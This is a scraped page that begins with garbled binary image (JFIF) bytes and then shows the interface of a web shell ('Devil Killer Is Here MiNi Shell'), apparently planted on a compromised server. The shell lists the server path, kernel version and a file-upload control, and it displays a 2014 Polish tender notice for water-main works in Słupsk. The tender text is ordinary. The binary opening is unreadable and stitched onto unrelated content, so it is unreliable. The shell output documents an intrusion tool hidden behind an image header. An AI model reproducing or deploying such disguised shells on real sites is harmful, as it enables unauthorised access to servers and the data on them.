JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140725/249430-N-2014.html

<p class="kh_header"><b>Słupsk: Budowa sieci wodociągowej obejmująca zadania:
Zadanie 1: Przebudowa sieci wodociągowej w ul. Hubalczyków w Słupsku
Zadanie 2: Budowa sieci wodociągowej rozdzielczej w ul. Jodłowej i ul. Jałowcowej
w Słupsku</b><br>
<b>Numer ogłoszenia: 249430 - 2014; data zamieszczenia: 25.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi Słupsk Sp. z o.o. , ul. E. Orzeszkowej 1, 76-200 Słupsk, woj. pomorskie, tel. 059 8426051 do 57,59 8400039, faks 059 8422207, 0590840 00 39.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodociagi.slupsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci wodociągowej obejmująca zadania:
Zadanie 1: Przebudowa sieci wodociągowej w ul. Hubalczyków w Słupsku
Zadanie 2: Budowa sieci wodociągowej rozdzielczej w ul. Jodłowej i ul. Jałowcowej
w Słupsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.Opis przedmiotu zamówienia
Przedmiotem niniejszego zamówienia jest budowa sieci wodociągowej w podziale na dwa zadania:
Zadanie 1: Przebudowa sieci wodociągowej w ul. Hubalczyków w Słupsku. 
Zadanie 2: Budowa sieci wodociągowej rozdzielczej w ul. Jodłowej i ul. Jałowcowej w  Słupsku.

4.1. Zadanie 1: Przebudowa sieci wodociągowej w ul. Hubalczyków w Słupsku.
Przedmiot zamówienia określa szczegółowo Projekt Budowlany [PB] Przebudowa sieci wodociągowej - ul. Hubalczyków w Słupsku; opracowany przez: inż. Andrzeja Mielczarka. Opracowanie: maj 2014 r. wraz z Decyzją Prezydenta Miasta Słupska nr 208/2014 o pozwoleniu na budowę sieci wodociągowej w ulicy Bohaterów Westerplatte i Hubalczyków w Słupsku.
Przedmiotem inwestycji jest przebudowa odcinka sieci wodociągowej o średnicy Dn500 mm i Dn250 mm wzdłuż ulicy Hubalczyków w Słupsku na działkach nr. 68/7, 70/2, 70/3 polegająca na zdemontowaniu istniejącego wodociągu Dn500 mm (L= ca 127 m) i odcinka Dn250mm (L= ca 58 m)
i wykonaniu w ich miejsce sieci wodociągowej z rur z żeliwa sferoidalnego o średnicy Dn250 mm (L=ca 178 m).
Wodociąg należy wykonać z rur żeliwnych sferoidalnych z wewnętrzną powłoką poliuretanową Dn250 mm od miejsca włączenia w węźle W-1 w rejonie skrzyżowania ul. Bohaterów Westerplatte i Hubalczyków do miejsca połączenia w węźle W-5 z wodociągiem Dn250mm w rejonie skrzyżowania ul. Hubalczyków i Górnej. W węźle W-1 należy podłączyć się do istniejącej zasuwy Dn300 mm a w węźle W-5 należy wymienić istniejącą zasuwę Dn250 na nową. 
 Po wykonaniu nowego odcinka sieci wodociągowej wraz z nowymi podłączeniami należy trwale wyłączyć istniejące odcinki sieci wodociągowej z eksploatacji (wskazane w opracowaniu), poprzez zaślepienie i zabezpieczenie blokami oporowymi. Wszystkie rurociągi, które zostaną trwale wyłączone z eksploatacji należy na inwentaryzacji geodezyjnej powykonawczej oznaczyć jako wodociąg nieczynny.  Oznakowanie uzbrojenia sieci wodociągowej należy wykonać poprzez montaż tabliczek metalowych z domiarami wykonanymi numeratorami i farbą. Wszelkie prace związane z wykonaniem przełączeń należy wykonywać po uprzednim uzgodnieniu z Zamawiającym.
Wykonawca ponosi wszystkie koszty niezbędne do należytego wykonania zamówienia, z uwzględnieniem wszelkich opłat, a w szczególności związanych z obsługą geodezyjną, geologiczną, projektu organizacji ruchu drogowego na czas prowadzenia robót, opłat za zajęcie pasów drogowych, ewentualnego odwodnienia i szalowania wykopów, koszty przywrócenia do poprzedniego stanu użyteczności pasów drogowych, itp.
a) koniec przedłużenia trzpienia (teleskopowy) zasuwy powinien znajdować się na głębokości ok. 15-25cm od powierzchni terenu i być wyprowadzony do skrzynki ulicznej,
b) skrzynkę uliczną do zasuw projektować z żeliwa lub z PEHD o wysokości min. 270mm z pokrywą żeliwną o wymiarach o średnicy min. 150mm,
c) w przypadku lokalizacji skrzynki w terenie nieutwardzonym, teren wokół skrzynki należy umocnić w promieniu min. 0,25m licząc od trzpienia.

Wszystkie materiały użyte do realizacji sieci winny być przedstawione do akceptacji przez Zamawiającego przed wbudowaniem.

4.2. Zadanie 2 - Budowa sieci wodociągowej rozdzielczej w ul. Jodłowej i ul. Jałowcowej w  Słupsku.
Przedmiot zamówienia określa szczegółowo Projekt Budowlany  [PB] sieci wodociągowej Jodłowa- sięgacze - budowa sieci wodociągowej rozdzielczej - ul. Jodłowa (dz. 752/15) i ul. Jałowcowa (dz. 1033/17) w Słupsku; opracowany przez inż. Jakuba Sieciechowicza. Opracowanie: styczeń 2014 r. wraz z Decyzją Prezydenta Miasta Słupska nr 233/2014 o pozwoleniu na budowę sieci wodociągowej rozdzielczej w ulicy Jodłowej i Jałowcowej w Słupsku.
Przedmiotem inwestycji jest budowa sieci wodociągowej  o średnicy De110mm (L= 549,8 m) w sięgaczach od ul. Jodłowej (dz. 752/15) i od ul. Jałowcowej (dz. 1033/17) wraz z połączeniami z istniejącą siecią wodociągową w ul. Jodłowej w Słupsku i wykonaniem przełączenia istniejących przyłączy wodociągowych o średnicy De40 na odcinkach zaprojektowanej sieci (o łącznej długości 98,60 m).
Wszystkie materiały użyte do realizacji sieci winny być przedstawione do akceptacji przez Zamawiającego przed wbudowani
4.3. Przedmiot umowy obejmuje ponadto przeprowadzenie w imieniu Zamawiającego, na podstawie udzielonego przez Zamawiającego pełnomocnictwa, procedury uzyskania prawomocnych decyzji administracyjnych w sprawie umieszczenia urządzeń w pasie drogowym oraz zajęcia pasa drogowego, w związku z wykonaniem robót objętych przedmiotem umowy, wydanych na podstawie art. 39 ust. 3 i 3a oraz art. 40 ust. 1 ustawy z dnia 21.03.1985 r. o drogach publicznych. Wykonawca zobowiązany jest do bezzwłocznego dostarczenia Zamawiającemu decyzji, o których mowa powyżej, jak również bezzwłoczne zgłoszenie Zamawiającemu zastrzeżeń do tych decyzji oraz współdziałanie z Zamawiającym w wypadku konieczności odwołania się od tych decyzji.

4.4. Wspólny słownik zamówień 
45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne.
45232150-8 Roboty w zakresie rurociągów do przesyłu wody..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.21.50-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, sporządzonego według wzoru stanowiącego Załącznik Nr 2 do IDW.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, sporządzonego według wzoru stanowiącego Załącznik Nr 2 do IDW.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w zakresie dysponowania odpowiednim potencjałem technicznym. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, sporządzonego według wzoru stanowiącego Załącznik Nr 2 do IDW.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek dysponowania osobami zdolnymi do wykonania zamówienia w sytuacji, kiedy wykaże że dysponuje co najmniej:

Kierownik budowy - niniejsza osoba musi posiadać następujące kwalifikacje:
­- uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
­- aktualne zaświadczenie o członkostwie w izbach samorządowych architektów lub inżynierów budownictwa dla Kierowników Budowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku zakresie sytuacji ekonomicznej i finansowej. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, sporządzonego według wzoru stanowiącego Załącznik Nr 2 do IDW.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3. Zawartość oferty.
1) kompletna oferta musi zawierać:
a) wszystkie dokumenty i oświadczenia wymienione w pkt 10 IDW
b) Formularz Oferty, sporządzony na podstawie wzoru stanowiącego Załącznik Nr 1 do IDW,
c) Kosztorys,
d) stosowne Pełnomocnictwo - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru,
e)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamowienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy 
w sprawie niniejszego zamówienia publicznego, 
2) pożądane przez Zamawiającego jest złożenie przez Wykonawcę w ofercie spisu treści z wyszczególnieniem ilości stron wchodzących w skład oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zmiana będzie dotyczyła następujących postanowień Umowy: 
1)	zmiany wymaganego terminu zakończenia realizacji przedmiotu umowy, 
2)	zmiany osób, przy pomocy których Wykonawca realizuje Umowę - wskazanych w ofercie,
3)	zmiany osób, przy pomocy których Zamawiający realizuje Umowę, 
4)	zmiany zakresu rzeczowego Umowy, 
5)	zmiany umówionego wynagrodzenia, 
6)	zmiany sposobu realizacji umowy, 
7)	innych zmian umowy, w tym związanych ze zmianą powszechnie obowiązujących przepisów prawa, w zakresie mającym wpływ na realizację przedmiotu umowy. 
2.	Zmiany o których mowa w ust. 1 mogą być dokonane na skutek zaistnienia następujących zdarzeń: 
1)	wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy 
2)	wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony. 
3)	wystąpienia konieczności zmiany osób wskazanych w ofercie (śmierć, choroba, ustania stosunku pracy ,inne zdarzenia losowe lub inne przyczyny niezależne od Wykonawcy) przy pomocy, których wykonawca realizuje przedmiot umowy. Przedmiotowa zmiana jest możliwa pod warunkiem zaproponowania innych osób, spełniających na dzień składania ofert, warunki określone przez zamawiającego w specyfikacji. 
4)	wystąpienia konieczności zmiany osób, przy pomocy których Zamawiający realizuje przedmiot umowy. 
5)	wystąpienia konieczności zmian osób Wykonawcy, w przypadku gdy Zamawiający uzna, że osoby te nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób, na inne spełniające na dzień składania ofert warunki określone w specyfikacji, w terminie nie dłuższym niż 14 dni od daty złożenia wniosku Zamawiającego. 
6)	wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi okolicznościami: 
a)	działania siły wyższej utrudniającej i uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami (przez siłę wyższa uważa się okoliczności będące poza rozsądną kontrolą każdej ze stron które powstały po zawarciu umowy, których żadna ze stron nie mogła przewidzieć w szczególności takie jak: wojna, działania wojenne, pożar, powódź, trzęsienie ziemi, inne klęski żywiołowe, skrajnie niekorzystne warunki atmosferyczne, zarządzenie i zakazy wydane przez władze oraz strajki), 
b)	wystąpienia warunków atmosferycznych odbiegających od typowych, uniemożliwiających prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów. 
c)	wystąpienia konieczności wprowadzenia zmian do opracowanej na rzecz Zamawiającego dokumentacji projektowej wymagających uzyskania stosownych decyzji wymaganych prawem,
d)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy, 
e)	zmiany danych teleadresowych, 
f)	zmiana obowiązującej stawki VAT, 
g)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy, 
h)	wystąpienie innej okoliczności niemożliwej do przewidzenia w dniu zawarcia Umowy, uniemożliwiającej wykonanie Umowy w określonym pierwotnie terminie lub zakresie. 
3.	Istotna zmiana postanowień zawartej Umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wodociagi.slupsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego w Słupsku przy ul. Elizy Orzeszkowej 1, pokój 8, budynek D - osobiście, pocztą lub ze strony internetowej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2014 godzina 10:00, miejsce: sekretariat - pokój nr 11, budynek A, ul. Elizy Orzeszkowej 1, 76-200 Słupsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Postępowanie prowadzone jest w trybie przetargu nieograniczonego na zasadach określonych w obowiązującym w Spółce Regulaminie udzielania zamówień z pomocniczym zastosowaniem ustawy Pzp (wraz z aktami wykonawczymi) w zakresie przetargu nieograniczonego. 
Przedmiotowe zamówienie jest zamówieniem sektorowym opisanym w art. 132 ust. 2 
w zw. z art. 132 ust. 1 pkt. 4) ustawy Pzp. W związku z tym, że wartość zamówienia jest mniejsza od kwot określonych w przepisach wydanych na podstawie art. 11 ust. 8 ustawy Pzp, Zamawiający nie jest obowiązany do stosowania Ustawy Pzp.
Biorąc pod uwagę możliwość zawarcia umowy cywilno-prawnej w drodze przetargu 
(art. 701 kodeksu cywilnego), Zamawiający zdecydował się na pomocnicze zastosowanie Ustawy Pzp w celu zapewnienia odpowiedniego standardu postępowania i prawidłowego wydatkowania środków publicznych (w szczególności w celu zachowania zasad uczciwej konkurencji, równego traktowania i przejrzystości postępowania). 
2. Poprzez pomocnicze stosowanie  ustawy Pzp rozumieć należy odpowiednie stosowanie tej ustawy w zakresie przebiegu procedury przetargowej oraz w przypadkach wyraźnie przewidzianych w niniejszej IDW. 
3. Językiem postępowania w sprawie niniejszego zamówienia jest język polski. 
4. Zamawiający przed upływem terminu składania ofert może zmienić treść ogłoszenia oraz Warunki Zamówienia lub unieważnić postępowanie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1: Przebudowa sieci wodociągowej w ul. Hubalczyków w Słupsku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 4.1. Zadanie 1: Przebudowa sieci wodociągowej w ul. Hubalczyków w Słupsku.
Przedmiot zamówienia określa szczegółowo Projekt Budowlany [PB] Przebudowa sieci wodociągowej - ul. Hubalczyków w Słupsku; opracowany przez: inż. Andrzeja Mielczarka. Opracowanie: maj 2014 r. wraz z Decyzją Prezydenta Miasta Słupska nr 208/2014 o pozwoleniu na budowę sieci wodociągowej w ulicy Bohaterów Westerplatte i Hubalczyków w Słupsku.
Przedmiotem inwestycji jest przebudowa odcinka sieci wodociągowej o średnicy Dn500 mm i Dn250 mm wzdłuż ulicy Hubalczyków w Słupsku na działkach nr. 68/7, 70/2, 70/3 polegająca na zdemontowaniu istniejącego wodociągu Dn500 mm (L= ca 127 m) i odcinka Dn250mm (L= ca 58 m)
i wykonaniu w ich miejsce sieci wodociągowej z rur z żeliwa sferoidalnego o średnicy Dn250 mm (L=ca 178 m).
Wodociąg należy wykonać z rur żeliwnych sferoidalnych z wewnętrzną powłoką poliuretanową Dn250 mm od miejsca włączenia w węźle W-1 w rejonie skrzyżowania ul. Bohaterów Westerplatte i Hubalczyków do miejsca połączenia w węźle W-5 z wodociągiem Dn250mm w rejonie skrzyżowania ul. Hubalczyków i Górnej. W węźle W-1 należy podłączyć się do istniejącej zasuwy Dn300 mm a w węźle W-5 należy wymienić istniejącą zasuwę Dn250 na nową. 
 Po wykonaniu nowego odcinka sieci wodociągowej wraz z nowymi podłączeniami należy trwale wyłączyć istniejące odcinki sieci wodociągowej z eksploatacji (wskazane w opracowaniu), poprzez zaślepienie i zabezpieczenie blokami oporowymi. Wszystkie rurociągi, które zostaną trwale wyłączone z eksploatacji należy na inwentaryzacji geodezyjnej powykonawczej oznaczyć jako wodociąg nieczynny.  Oznakowanie uzbrojenia sieci wodociągowej należy wykonać poprzez montaż tabliczek metalowych z domiarami wykonanymi numeratorami i farbą. Wszelkie prace związane z wykonaniem przełączeń należy wykonywać po uprzednim uzgodnieniu z Zamawiającym.
